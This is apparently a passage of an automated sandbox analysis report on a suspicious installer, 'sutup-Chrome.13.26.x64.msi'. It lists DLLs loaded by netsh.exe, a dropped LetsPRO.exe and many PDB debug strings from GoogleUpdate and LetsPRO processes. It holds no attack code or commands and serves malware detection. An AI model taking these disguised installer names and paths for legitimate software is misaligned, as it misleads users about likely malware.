                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: sutup-Chrome.13.26.x64.msiStatic file information: File size 16345600 > 1048576
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\MSVCR100.dllJump to behavior
                  Source: Binary string: GoogleUpdateCore_unsigned.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fa.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115530845.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fa.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*L source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .\Device\HarddiskVolume3 Settings\Temp\Symbols\winload_prod.pdb\*.*.*er Data\GraphiteDawnCache\LetsPRO.exeRO.exexeeS/- source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_lt.pdb source: goopdateres_lt.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_el.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112233722.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_mr.pdb source: goopdateres_mr.dll.16.dr
                  Source: Binary string: cation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDB source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bg.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108636154.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bg.dll.30.dr, goopdateres_bg.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*@ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ar.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108359018.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ar.dll.16.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb@ source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_de.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111761457.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_gu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117478429.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_gu.dll.16.dr
                  Source: Binary string: TEST_mi_exe_stub.pdb source: ChromeSetup.exe, 00000010.00000002.3261124780.0000000000029000.00000002.00000001.01000000.00000005.sdmp, ChromeSetup.exe, 00000010.00000000.2019739468.0000000000029000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2{ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\" source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psmachine_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_es-419.pdb source: GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114195324.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es-419.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sl.pdb source: goopdateres_sl.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_pl.pdb source: goopdateres_pl.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_is.pdb source: GoogleUpdate.exe, 0000001E.00000003.2121928783.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_is.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_th.pdb source: goopdateres_th.dll.30.dr
                  Source: Binary string: GoogleCrashHandler_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110156700.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bn.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112625418.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ko.pdb source: GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2133014724.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ko.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-TW.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008BF000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ca.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110803785.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, GoogleUpdate.exe, 0000001E.00000002.3261001713.0000000000121000.00000020.00000001.01000000.00000008.sdmp, GoogleUpdate.exe.30.dr, GoogleUpdate.exe.16.dr
                  Source: Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169122915.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateBroker.exe.16.dr, GoogleUpdateBroker.exe.30.dr
                  Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 00000008.00000002.2082649111.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000008.00000000.2016836584.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000002.2085508018.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000000.2017338659.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000002.2085509347.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000000.2017352894.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000000.2017959585.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000002.2081423718.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000002.2179702546.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000000.2021432146.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000000.2030073468.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000002.2096564571.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000002.2101128457.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000000.2028409698.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000002.2090627708.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000000.2028772226.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000000.2028783611.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000002.2090626641.000000000026D000.00000002.00000001.01000000.00000004.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056h& source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_pt-PT.pdb source: goopdateres_pt-PT.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_am.pdb source: GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108069440.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_am.dll.30.dr
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleCrashHandler_unsigned.pdbp source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_cs.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111107544.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_cs.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*u source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*sC source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_da.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111407957.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_iw.pdb source: GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127845823.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ja.pdb source: GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2130517355.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psuser_unsigned_64.pdbF source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_et.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115013262.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_et.dll.30.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\LetsPRO.execation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2231954101.0000000000624000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4876bf7-244b-4c34-87a7-98ddf5c5224d}\*.*ecation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exern source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdbR source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ons\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B784 source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118651881.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hr.dll.16.dr
                  Source: Binary string: TEST_psuser_unsigned_64.pdb source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4 source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_hi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118068933.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exeU source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2170069383.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169861546.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateOnDemand.exe.30.dr, GoogleUpdateOnDemand.exe.16.dr
                  Source: Binary string: 785491~1.LOCntkrnlmp.pdb5x source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdate_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5r source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ms.pdb source: goopdateres_ms.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116824716.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fr.dll.30.dr
                  Source: Binary string: msvcr100.i386.pdb source: LetsPRO.exe, LetsPRO.exe, 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000D.00000002.2181610240.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000E.00000002.2186367127.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000F.00000002.2173589064.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000011.00000002.2191724074.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000012.00000002.2192475621.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000013.00000002.2192454597.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001A.00000002.2192585742.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001B.00000002.2192407874.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001C.00000002.2191917426.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001D.00000002.2181725589.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001F.00000002.2209318696.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp
